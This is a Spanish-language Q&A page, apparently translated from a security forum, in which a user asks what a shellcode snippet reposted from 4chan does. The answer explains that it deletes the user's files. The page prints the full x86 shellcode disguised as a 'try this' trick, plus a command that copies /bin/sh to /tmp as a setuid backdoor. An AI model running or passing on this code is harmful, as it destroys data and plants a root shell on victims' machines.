¿Qué hace este código potencialmente malicioso? [cerrado]

2

Mientras leía un sitio web llamado 4chan / b / alguien publicó este fragmento de código, me preguntaba qué hace cuando se ejecuta. Parece ser un código C, ¿qué tan dañino es?

Esta es la publicación completa:

Run a live system and try this:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
                                               release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

¿Sería seguro probarlo en un arenero?

    
pregunta kyle k 13.12.2014 - 02:33
fuente

1 respuesta

6

El gibberish hexadecimal que ves es código de máquina .

Buscar en Google para esa cadena hexadecimal en particular revela esta página wiki .

Según el wiki, esto funciona:

rm -rf ~ / &

Sí, es bastante dañino, pero debería ser seguro ejecutarlo en una máquina virtual, si tiene una copia de seguridad (o instantánea), en un usuario sin privilegios, de lo contrario, si la ejecuta como un usuario con privilegios borrará sus archivos

    
respondido por el Ayrx 13.12.2014 - 02:39
fuente

Lea otras preguntas en las etiquetas